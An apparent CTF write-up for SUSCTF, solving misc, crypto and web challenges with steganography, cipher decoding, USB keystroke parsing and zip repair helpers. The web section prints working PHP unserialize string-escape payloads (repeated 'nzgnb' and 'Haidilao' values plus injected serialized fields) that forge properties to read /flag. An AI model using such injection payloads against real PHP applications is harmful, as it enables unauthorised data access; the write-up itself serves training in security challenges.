Preface: by the time I got an account there was only half a day left, so I worked through some challenges on and off. Some of the web challenge environments were shut down before I could reproduce them; see you on BUU.
MISC

签到 (Sign-in): SUSCTF{Welcome_t0_SUSCTF}

调查问卷 (Questionnaire): SUSCTF{Thank_y0u_fOr_your_r3ply}

爆破鬼才请求出战 (Brute-force genius requests to fight): Round 1, mask brute-force.

[image]

[image]
Round 2: LSB steganography.

[image]
Round 3: rail fence cipher.

S{urgdt1}UY_30__sS0a_04mc

[image]

SUS{Y0u_ar3_g00d_4t_m1sc}
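The "rail fence" in this round is the grouped variant (the plaintext is written in rows of k characters and the ciphertext is read off column by column), which the writeup solved with an online tool. As an added example that is not the writeup's code, here is a Python decoder for that variant; since k is unknown, it tries every group size and keeps the candidates that look like a flag. The flag prefix SUS{ is an assumption taken from the other flags on this page.

```python
# Added example (not the writeup's code): decrypt the grouped rail-fence
# variant, where plaintext is written in rows of k characters and the
# ciphertext is read out column by column.


def grouped_rail_fence_encrypt(plain: str, k: int) -> str:
    """Column j of the k-wide grid is every k-th character starting at j."""
    return "".join(plain[j::k] for j in range(k))


def grouped_rail_fence_decrypt(cipher: str, k: int) -> str:
    """Split the ciphertext back into its k columns, then read row by row."""
    full_rows, extra = divmod(len(cipher), k)
    # The first `extra` columns are one character longer (the partial last row).
    columns, pos = [], 0
    for j in range(k):
        length = full_rows + (1 if j < extra else 0)
        columns.append(cipher[pos:pos + length])
        pos += length
    plain = []
    for r in range(full_rows + (1 if extra else 0)):
        for col in columns:
            if r < len(col):
                plain.append(col[r])
    return "".join(plain)


def recover_flag(cipher: str, prefix: str = "SUS{") -> list:
    """Unknown group size: try every k and keep decryptions that look like a
    flag. The prefix is an assumption taken from the other flags on this page."""
    hits = []
    for k in range(2, len(cipher)):
        plain = grouped_rail_fence_decrypt(cipher, k)
        if plain.startswith(prefix) and plain.endswith("}"):
            hits.append((k, plain))
    return hits


if __name__ == "__main__":
    # Ciphertext quoted from the writeup above.
    for k, plain in recover_flag("S{urgdt1}UY_30__sS0a_04mc"):
        print(f"k={k}: {plain}")
```

Only k=3 survives the prefix check for this ciphertext, because the second plaintext character is the first character of column 2, and that lands on the U only when the first column is nine characters long.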
签到之公众号 (Sign-in via the official account): SUSCTF{W3lc0m3_t0_SUSCTF}

Dance_Dance: Round 1, the dancing men cipher.

[image]

Matched the characters against an online site; a figure holding a flag marks the end of a word.

[image]

passwdLetU sdanCe
Round 2: binwalk extraction.

[image]

Archive password: LetUsdanCe

Round 3: a QR code in the audio spectrogram.

[image]

In the end I drew it out by hand.

[image]

SUS{1nt3r35t1nG_5p3ctRum}
ƃɐlɟ¯ʇuᴉɹԀ: reverse the hex data to get a zip.

The zip contains a txt and an encrypted archive; run a character frequency analysis on the txt.

[image]

Mima (password): D0youkNOw3dpr1nt?
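The two steps above, undoing a reversed hex dump and ranking characters by frequency, as an added Python example that is not the writeup's code. A "reversed" dump can have been reversed by hex digit or by byte, so the helper tries both and keeps the order that yields a zip local file header. The dump and the text it is run on are constructed samples built in the script, not the challenge files.

```python
# Added example (not the writeup's code): undo a reversed hex dump and confirm
# the result is a zip, then order the characters of a text by frequency.
# The dump and the text below are constructed samples, not the challenge files.
import io
import random
import zipfile
from collections import Counter

ZIP_LOCAL_HEADER = b"PK\x03\x04"


def unreverse_hex(hex_text: str):
    """A reversed dump may be reversed by nibble (the hex characters) or by
    byte; try both and return (method, data) for the one that yields a zip."""
    clean = "".join(hex_text.split())
    candidates = {
        "nibble": bytes.fromhex(clean[::-1]),
        "byte": bytes.fromhex(clean)[::-1],
    }
    for method, data in candidates.items():
        if data.startswith(ZIP_LOCAL_HEADER):
            return method, data
    raise ValueError("neither reversal starts with a zip local file header")


def zip_names(data: bytes) -> list:
    return zipfile.ZipFile(io.BytesIO(data)).namelist()


def frequency_order(text: str, top: int = None) -> str:
    """Characters of `text` from most to least frequent, whitespace ignored.
    Counter.most_common keeps first-seen order for ties."""
    counts = Counter(ch for ch in text if not ch.isspace())
    return "".join(ch for ch, _ in counts.most_common(top))


def constructed_reversed_dump() -> str:
    """Build a real zip in memory, then reverse its bytes and hex-encode it to
    mimic the challenge input (constructed sample)."""
    mem = io.BytesIO()
    with zipfile.ZipFile(mem, "w") as zf:
        zf.writestr("hint.txt", "constructed sample, not the real file\n")
    return mem.getvalue()[::-1].hex()


# Constructed text: the characters of "D0you" occur with strictly decreasing
# frequency, shuffled with a fixed seed so the order is not visible by eye.
_chars = [ch for i, ch in enumerate("D0you") for _ in range(12 - i)]
random.Random(7).shuffle(_chars)
SAMPLE_TEXT = "".join(_chars)


if __name__ == "__main__":
    method, data = unreverse_hex(constructed_reversed_dump())
    print(method, zip_names(data))
    print(frequency_order(SAMPLE_TEXT))
```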
Judging by the file contents, the software involved is Cura_SteamEngine 4.6.2.

Hardware I don't have; I'm out.
[萌]你还好吗? ([Cute] Are you OK?): decode the Ook! cipher with an online site.

[image]

Ar3_y0u_OK??

Extracting the archive gives an image; the hint says the height is not enough, so change the height in WinHex.

[image]

SUS{wuhu_y0u_f1nD_m3}
[萌]fix_fo: drag it into WinHex and repair the file header.

[image]
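The two WinHex edits done by hand on this page, repairing the file header here in [萌]fix_fo and raising the image height in [萌]你还好吗?, as an added Python example that is not the writeup's code. It works on a constructed PNG whose IHDR declares fewer rows than its IDAT stream actually contains, which is the usual shape of the "image too short" trick, and it recomputes the IHDR CRC after patching, which a plain hex edit does not.

```python
# Added example (not the writeup's code): PNG signature repair and IHDR height
# patching with the chunk CRC recomputed, on a constructed image.
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(kind: bytes, payload: bytes) -> bytes:
    """length + type + data + CRC-32 over type and data."""
    return (struct.pack(">I", len(payload)) + kind + payload
            + struct.pack(">I", zlib.crc32(kind + payload)))


def make_sample_png(width: int, rows: int, declared_height: int) -> bytes:
    """Constructed 8-bit grayscale PNG with `rows` real scanlines in IDAT but
    `declared_height` in IHDR (the hidden-rows trick when declared < rows)."""
    raw = b"".join(b"\x00" + bytes((r * 40 + c * 10) & 0xFF for c in range(width))
                   for r in range(rows))
    ihdr = struct.pack(">IIBBBBB", width, declared_height, 8, 0, 0, 0, 0)
    return (PNG_SIG + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(raw)) + png_chunk(b"IEND", b""))


def repair_signature(data: bytes) -> bytes:
    """Rewrite the first 8 bytes if the rest of the file is laid out like a PNG."""
    if data[12:16] != b"IHDR":
        raise ValueError("no IHDR at offset 12; not a PNG with a damaged signature")
    return PNG_SIG + data[8:]


def png_dimensions(data: bytes) -> tuple:
    return struct.unpack(">II", data[16:24])


def ihdr_crc_ok(data: bytes) -> bool:
    return struct.unpack(">I", data[29:33])[0] == zlib.crc32(data[12:29])


def iter_chunks(data: bytes):
    pos = 8
    while pos + 8 <= len(data):
        length, kind = struct.unpack(">I4s", data[pos:pos + 8])
        yield kind, data[pos + 8:pos + 8 + length]
        pos += 12 + length


def rows_in_idat(data: bytes) -> int:
    """How many scanlines the decompressed image data really holds
    (8-bit grayscale: width pixels plus one filter byte per row)."""
    width, _ = png_dimensions(data)
    raw = zlib.decompress(b"".join(p for k, p in iter_chunks(data) if k == b"IDAT"))
    return len(raw) // (width + 1)


def set_png_height(data: bytes, new_height: int) -> bytes:
    """Patch the IHDR height and recompute its CRC; a hand edit that leaves the
    old CRC in place is rejected by strict decoders."""
    width, _ = png_dimensions(data)
    ihdr = struct.pack(">IIBBBBB", width, new_height, *data[24:29])
    return data[:8] + png_chunk(b"IHDR", ihdr) + data[33:]


if __name__ == "__main__":
    img = make_sample_png(4, rows=6, declared_height=2)
    fixed = repair_signature(b"\x00" * 8 + img[8:])
    print("declared", png_dimensions(fixed), "real rows", rows_in_idat(fixed))
    taller = set_png_height(fixed, rows_in_idat(fixed))
    print("after patch", png_dimensions(taller), "crc ok", ihdr_crc_ok(taller))
```

Comparing rows_in_idat against the declared height is also a quick way to confirm the "not tall enough" hint before editing anything: when the stream holds more scanlines than the header admits, the extra rows are where the hidden content lives.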
Extracting gives a 新佛曰 (New Buddha Says) cipher:

新佛曰:諸隸殿僧降殿吽殿諸陀摩隸僧缽薩殿願心殿薩殿咤伏殿聞莊摩咤殿諦殿如叻須降闍殿亦修我殿愍殿諸隸殿波如空殿如如囑囑殿

[image]

SUS{Ta1k_w1th_F0}
抓住那只小老鼠 (Catch that little mouse): Round 1, zip pseudo-encryption; only one of the archives is pseudo-encrypted.

[image]
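Pseudo-encryption means bit 0 of the general-purpose flag is set in the zip headers although the entry data was never encrypted, so extractors ask for a password that does not exist. As an added Python example that is not the writeup's code, the script below walks the central directory, reports that bit for the local and central header of each entry, clears it, and checks that the standard library can then read the entry. The archive is constructed in memory.

```python
# Added example (not the writeup's code): detect and clear zip
# "pseudo-encryption", where bit 0 of the general-purpose flag is set in the
# headers although the entry data was never encrypted. The sample archive is
# constructed in memory.
import io
import struct
import zipfile

SIG_CENTRAL, SIG_EOCD = b"PK\x01\x02", b"PK\x05\x06"


def iter_entries(buf: bytes):
    """Walk the central directory; yield (name, central_offset, local_offset)."""
    eocd = buf.rfind(SIG_EOCD)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    count = struct.unpack_from("<H", buf, eocd + 10)[0]
    pos = struct.unpack_from("<I", buf, eocd + 16)[0]
    for _ in range(count):
        if buf[pos:pos + 4] != SIG_CENTRAL:
            raise ValueError(f"bad central directory entry at offset {pos}")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", buf, pos + 28)
        local_off = struct.unpack_from("<I", buf, pos + 42)[0]
        name = buf[pos + 46:pos + 46 + name_len].decode("utf-8", "replace")
        yield name, pos, local_off
        pos += 46 + name_len + extra_len + comment_len


def encryption_bits(buf: bytes) -> dict:
    """{name: (local header bit 0, central header bit 0)} for every entry."""
    return {
        name: (struct.unpack_from("<H", buf, l + 6)[0] & 1,
               struct.unpack_from("<H", buf, c + 8)[0] & 1)
        for name, c, l in iter_entries(buf)
    }


def _rewrite_encryption_bit(buf: bytes, value: int) -> bytes:
    out = bytearray(buf)
    for _, c, l in iter_entries(buf):
        for off in (l + 6, c + 8):  # flags live at +6 locally, +8 centrally
            flags = struct.unpack_from("<H", out, off)[0]
            struct.pack_into("<H", out, off, (flags & 0xFFFE) | value)
    return bytes(out)


def clear_pseudo_encryption(buf: bytes) -> bytes:
    """Clear bit 0 in both headers of every entry. Only meaningful when the
    data really is unencrypted; a truly encrypted entry just fails its CRC."""
    return _rewrite_encryption_bit(buf, 0)


def read_entry(buf: bytes, name: str) -> bytes:
    return zipfile.ZipFile(io.BytesIO(buf)).read(name)


def readable_without_password(buf: bytes, name: str) -> bool:
    try:
        read_entry(buf, name)
        return True
    except RuntimeError:  # zipfile: "File ... is encrypted, password required"
        return False


def make_pseudo_encrypted_sample() -> bytes:
    """Constructed sample: a normal archive with the encryption bit forced on."""
    mem = io.BytesIO()
    with zipfile.ZipFile(mem, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("keyboard.pcapng", b"constructed placeholder content\n")
    return _rewrite_encryption_bit(mem.getvalue(), 1)


if __name__ == "__main__":
    sample = make_pseudo_encrypted_sample()
    print("before:", encryption_bits(sample))
    print("after: ", encryption_bits(clear_pseudo_encryption(sample)))
```

The tell-tale of pseudo-encryption in a real archive is a flag bit that disagrees between the local and central header, or that is set while the data still has a valid CRC after the bit is cleared; an entry that was genuinely encrypted produces garbage and a CRC error instead.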
Extracting gives a keyboard capture; a quick look shows it is keystroke data:
```
00:00:13:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:04:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1a:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:12:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:15:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:07:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2c:00:00:00:00:00
00:00:00:00:00:00:00:00
02:00:00:00:00:00:00:00
02:00:33:00:00:00:00:00
02:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2c:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:18:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:22:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0f:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0e:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:21:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0b:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:20:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:15:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1e:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0a:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0b:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:05:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:18:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:11:00:00:00:00:00
00:00:00:00:00:00:00:00
```
[image]

passwordl3t-u5-l00k-4t-th3-r1ght-butt0n
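Each capture line above is one USB HID boot-protocol keyboard report: byte 0 holds the modifier bits, byte 1 is reserved, and bytes 2 to 7 carry up to six key usage IDs; an all-zero report is a key release. As an added Python example that is not the writeup's script, the decoder below maps usage IDs through the US layout table and honours the Shift modifier (the report 02:00:33 is Shift plus ';'). The 86 records are copied from the capture listing above.

```python
# Added example (not the writeup's script): decode USB HID boot-protocol
# keyboard reports (8 bytes: modifiers, reserved, up to six key usage IDs)
# into the typed text, with Shift handled. Records copied from the writeup.

# Unshifted / shifted characters for HID usage IDs, US layout.
KEYMAP = {0x04 + i: (chr(0x61 + i), chr(0x41 + i)) for i in range(26)}
KEYMAP.update({
    0x1E: ("1", "!"), 0x1F: ("2", "@"), 0x20: ("3", "#"), 0x21: ("4", "$"),
    0x22: ("5", "%"), 0x23: ("6", "^"), 0x24: ("7", "&"), 0x25: ("8", "*"),
    0x26: ("9", "("), 0x27: ("0", ")"), 0x28: ("\n", "\n"), 0x2B: ("\t", "\t"),
    0x2C: (" ", " "), 0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x2F: ("[", "{"),
    0x30: ("]", "}"), 0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'),
    0x35: ("`", "~"), 0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
})
BACKSPACE = 0x2A
SHIFT_MASK = 0x22  # bit 1 = left Shift, bit 5 = right Shift


def decode_hid_reports(records) -> str:
    """Emit one character per key press. A usage ID that was already present
    in the previous report is a held key, not a new press, so key repeat and
    the all-zero release reports contribute nothing."""
    out, held = [], set()
    for rec in records:
        raw = bytes.fromhex(rec.replace(":", ""))
        if len(raw) != 8:
            raise ValueError(f"report is not 8 bytes: {rec}")
        shifted = bool(raw[0] & SHIFT_MASK)
        keys = [k for k in raw[2:8] if k]
        for key in keys:
            if key in held:
                continue
            if key == BACKSPACE:
                if out:
                    out.pop()
            elif key in KEYMAP:
                out.append(KEYMAP[key][1 if shifted else 0])
            else:
                out.append(f"<{key:#04x}>")  # unmapped usage ID, keep it visible
        held = set(keys)
    return "".join(out)


# The 86 reports from the capture listing in the writeup (usb.capdata values).
CAPTURE = """
00:00:13:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:04:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:16:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:1a:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:12:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:15:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:07:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:2c:00:00:00:00:00 00:00:00:00:00:00:00:00 02:00:00:00:00:00:00:00 02:00:33:00:00:00:00:00
02:00:00:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:2c:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:0f:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:20:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:18:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:22:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:0f:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:27:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:27:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:0e:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:21:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:0b:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:20:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:15:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:1e:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:0a:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:0b:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:2d:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:05:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:18:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:17:00:00:00:00:00 00:00:00:00:00:00:00:00 00:00:27:00:00:00:00:00 00:00:00:00:00:00:00:00
00:00:11:00:00:00:00:00 00:00:00:00:00:00:00:00
""".split()


if __name__ == "__main__":
    print(decode_hid_reports(CAPTURE))
```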
Couldn't open that archive; I'm stuck.
emoji真好玩 (Emoji are fun): judging by the file name, this is a jpg with JPHS steganography, and the password is in the emoji.

It can be decoded with a script from GitHub.

[image]

password: C0de3moj1

Use the password to extract the hidden data from the image.

[image]
That yields a string of 0s and 1s; the file name says to draw it, so the guess is that the 01 string should be turned into a QR code.

The square root gives a 245*245 QR code; running a script produces the QR image.

[image]
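The drawing step, as an added Python example that is not the writeup's script: it checks that the bit count is a perfect square, then writes the bits as a black-and-white PNG using only the standard library, scaling each bit to a block so a phone scanner can read it. The 5x5 bit string is a constructed sample; the challenge's had 245*245 = 60025 bits. Which value counts as "dark" is a guess, so the polarity is a parameter.

```python
# Added example (not the writeup's script): render a string of '0'/'1'
# characters as a square black-and-white PNG using only the standard library,
# the step that turns the extracted bit string into a scannable QR image.
# The 5x5 bit string below is a constructed sample.
import math
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(kind: bytes, payload: bytes) -> bytes:
    return (struct.pack(">I", len(payload)) + kind + payload
            + struct.pack(">I", zlib.crc32(kind + payload)))


def grid_side(bits: str):
    """Side length if the bit count is a perfect square, else None."""
    n = len("".join(bits.split()))
    side = math.isqrt(n)
    return side if side * side == n else None


def bits_to_png(bits: str, scale: int = 4, one_is_black: bool = True) -> bytes:
    """8-bit grayscale PNG, each bit drawn as a scale x scale block. Try
    one_is_black=False if a scanner rejects the image: the polarity is a guess."""
    bits = "".join(bits.split())
    side = grid_side(bits)
    if side is None:
        raise ValueError(f"{len(bits)} bits is not a perfect square")
    rows = []
    for r in range(side):
        line = bits[r * side:(r + 1) * side]
        px = bytes(0 if (b == "1") == one_is_black else 255
                   for b in line for _ in range(scale))
        rows.extend([b"\x00" + px] * scale)  # filter type 0 on every scanline
    size = side * scale
    ihdr = struct.pack(">IIBBBBB", size, size, 8, 0, 0, 0, 0)
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(b"".join(rows))) + _chunk(b"IEND", b""))


def png_dimensions(png: bytes) -> tuple:
    return struct.unpack(">II", png[16:24])


def png_rows(png: bytes) -> list:
    """Decode the single IDAT chunk this writer emits back into pixel rows."""
    width, height = png_dimensions(png)
    idat_len = struct.unpack(">I", png[33:37])[0]
    raw = zlib.decompress(png[41:41 + idat_len])
    stride = width + 1  # filter byte + width pixels
    return [list(raw[r * stride + 1:(r + 1) * stride]) for r in range(height)]


SAMPLE_BITS = "10101 01010 10101 01010 10101"  # constructed 5x5 checkerboard


if __name__ == "__main__":
    with open("qr.png", "wb") as fh:
        fh.write(bits_to_png(SAMPLE_BITS))
```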
SUS{1p0ch_wanNA_4_npy5}

小熊你咋带着品如的面具 (Little bear, why are you wearing Pinru's mask): it looks like the iso has to be examined forensically first, and the recovered password then used with EncryptoforWin to decrypt.
CRYPTO

[简单]嘤语 ([Easy] emoji English)

Challenge text: Little Z intercepted an encrypted conversation on some site:

😳😊⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺🤐🔑⬜🤣⬜😇😠🤣🤪🤪😳😇🤣😠⬜😇😳😖🥺😍😏⬜😳🤪⬜🤣⬜😋🤐😖😍⬜🤩😆⬜😇😳😖🥺😍😏⬜😋🥺🤣😋⬜😴🤣🤪⬜😘🤪😍🙃⬜🥺😳🤪😋🤩😏😳😇🤣😠😠🤐⬜😅😘😋⬜😊🤩😴⬜🥺🤣🤪⬜😆🤣😠😠😍😊🔑⬜😆🤩😏⬜😋🥺😍⬜😭🤩🤪😋⬜😖🤣😏😋🔑⬜😳😊😋🤩⬜🙃😳🤪😘🤪😍⭕⬜😳😊⬜😇🤩😊😋😏🤣🤪😋⬜😋🤩⬜😭🤩🙃😍😏😊⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺😳😇⬜🤣😠🧐🤩😏😳😋🥺😭🤪🔑⬜😭🤩🤪😋⬜😇😠🤣🤪🤪😳😇🤣😠⬜😇😳😖🥺😍😏🤪⬜😇🤣😊⬜😅😍⬜😖😏🤣😇😋😳😇🤣😠😠🤐⬜😇🤩😭😖😘😋😍🙃⬜🤣😊🙃⬜🤪🤩😠😮😍🙃⬜😅🤐⬜🥺🤣😊🙃⭕⬜🥺🤩😴😍😮😍😏🔑⬜😋🥺😍🤐⬜🤣😏😍⬜🤣😠🤪🤩⬜😘🤪😘🤣😠😠🤐⬜😮😍😏🤐⬜🤪😳😭😖😠😍⬜😋🤩⬜😅😏😍🤣😷⬜😴😳😋🥺⬜😭🤩🙃😍😏😊⬜😋😍😇🥺😊🤩😠🤩🧐🤐⭕⬜😋🥺😍⬜😋😍😏😭⬜😳😊😇😠😘🙃😍🤪⬜😋🥺😍⬜🤪😳😭😖😠😍⬜🤪🤐🤪😋😍😭🤪⬜😘🤪😍🙃⬜🤪😳😊😇😍⬜🧐😏😍😍😷⬜🤣😊🙃⬜😏🤩😭🤣😊⬜😋😳😭😍🤪🔑⬜😋🥺😍⬜😍😠🤣😅🤩😏🤣😋😍⬜😏😍😊🤣😳🤪🤪🤣😊😇😍⬜😇😳😖🥺😍😏🤪🔑⬜😴🤩😏😠🙃⬜😴🤣😏⬜😳😳⬜😇😏🤐😖😋🤩🧐😏🤣😖🥺🤐⬜🤪😘😇🥺⬜🤣🤪⬜😋🥺😍⬜😍😊😳🧐😭🤣⬜😭🤣😇🥺😳😊😍⬜🤣😊🙃⬜😅😍🤐🤩😊🙃⭕⬜🥺😍😏😍⬜😳🤪⬜🤐🤩😘😏⬜😆😠🤣🧐☯⬜🤪😘🤪😇😋😆🌘😍🤣🤪🤐⛔😏😍😖😠🤣😇😍⛔😇😏🤐😖😋🤩🌒⭕

After many attempts, Little Z managed to recover some of the special characters:

⭕ => .
☯ => :
🔑 => ,
⛔ => _
🌘 => {
🌒 => }

Can you help him? Note: the flag is all uppercase.
I found an encoding table and a decoding site, but they aren't needed here; this one is solved purely by guessing English. For instance, the last segment should be the flag:

```
🤪😘🤪😇😋😆 SUSCTF
🌘😍🤣🤪🤐⛔😏😍😖😠🤣😇😍⛔😇😏🤐😖😋🤩🌒 SUSCTF{**S*_*****C*_C***T*}
```

Then guess common English words such as THE and IS from the emoji already known and the sense of the sentences:

```
😋🥺😍 THE
😳🤪 IS
😆😠🤣🧐☯ FLAG:
😋🥺😍🤐 THEY
😋🤐😖😍 TYPE
```

Updated flag: SUSCTF{EASY_REPLACE_CRYPTE}
WEB

Sign_in: capture the request and change it to POST parameters.

[image]

SUSCTF{397d79b4fd5bb85d73d86742dfdf223d}

AT_Field: change the permitted input length, enter flag and submit.

[image]

SUSCTF{0e808712e2a814fe0cd126e09159226a}

Script_Kiddle: capture a request and brute-force it; whether it lands is a matter of luck.

[image]

SUSCTF{24bf10b0f61c19e10a631e4c603127b2}
first_lesson

```php
<?php
highlight_file(__FILE__);
if (isset($_GET["z33"])) {
    echo "<p>z33 is " . $_GET['z33'] . "</p>";
    if ($_GET["z33"] === "feiwu") {
        if (isset($_GET["rmb"])) {
            echo "<p>rmb is " . $_GET["rmb"] . "</p>";
            if ($_GET["rmb"] === "shenxian") {
                if (isset($_POST["aa"])) {
                    echo "<p>aa is dage of " . $_POST["aa"] . "</p>";
                    if ($_POST["aa"] === "z33&rmb") {
                        echo file_get_contents("/flag");
                    }
                } else {
                    echo "<p>use POST method to submit aa</p>";
                }
            }
        } else {
            echo "<p>use GET method to submit rmb</p>";
        }
    }
} else {
    echo "<p>use GET method to submit z33</p>";
}
```
[image]

SUSCTF{so_who_is_AA}

刀来! (Bring the knife!)

[image]

SUSCTF{f5f397a37b728d927576ae889b908d17}
Ez_escape1

```php
<?php
highlight_file(__file__);
$name = $_POST["name"];
$number = 10086;
class escape {
    public $name;
    public $number;
    public function __construct($name, $number) {
        $this->name = $name;
        $this->number = $number;
    }
}
function filter($string) {
    return str_replace('nzgnb', 'nzgyyds', $string);
}
$epoch = filter(serialize(new escape($name, $number)));
echo $epoch . "<br>";
$ep0ch = unserialize($epoch);
if ($ep0ch->number === 1008611) {
    echo base64_encode(file_get_contents("/flag"));
} else {
    echo "try again";
}
```
nzgnb is replaced with nzgyyds, which escapes 2 characters per occurrence; the data to inject is 26 characters long, so sending 13 copies of nzgnb in name is enough to escape:

```
{s:4:"name";s:91:"nzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyydsnzgyyds";s:6:"number";i:1008611;}";s:6:"number";i:10086;}
```

U1VTQ1RGe2MyYmQyOWRiNDk1N2JmODBjM2M5OWRlMTliZDRhNjBkfQ==

SUSCTF{c2bd29db4957bf80c3c99de19bd4a60d}
Ez_escape2

```php
<?php
highlight_file(__file__);
$haidilao = $_POST["haidilao"];
$core = $_POST["core"];
$num = "2019";
class escape2 {
    public $haidilao;
    public $core;
    public $num;
    public function __construct($haidilao, $core, $num) {
        $this->haidilao = $haidilao;
        $this->core = $core;
        $this->num = $num;
    }
    public function __wakeup() {
        if ($this->num === "2020") {
            echo base64_encode(file_get_contents("/flag"));
        } else {
            echo "try again";
        }
    }
}
function filter($string) {
    return str_replace('Haidilao', 'Hedilao', $string);
}
$btis = filter(serialize(new escape2($haidilao, $core, $num)));
echo "<br>" . $btis . "<br>";
$bt15 = unserialize($btis);
```
Based on the principle that the filter shortens the string, construct the value to pass in core:

```
O:7:"escape2":3:{s:8:"haidilao";s:8:"Hedilao";s:4:"core";s:1:"1";s:3:"num";s:4:"2019";}
";s:4:"core";s:1:"
";s:4:"core";s:1:"1";s:3:"num";s:4:"2020";}   # the core value to send
```

Up to the value of core there are 19 characters, so send 19 copies of Haidilao; once they are replaced with Hedilao, 19 characters are swallowed and the payload that follows fills in:

```
haidilao=HaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilaoHaidilao&core=";s:4:"core";s:3:"123";s:3:"num";s:4:"2020";}
```
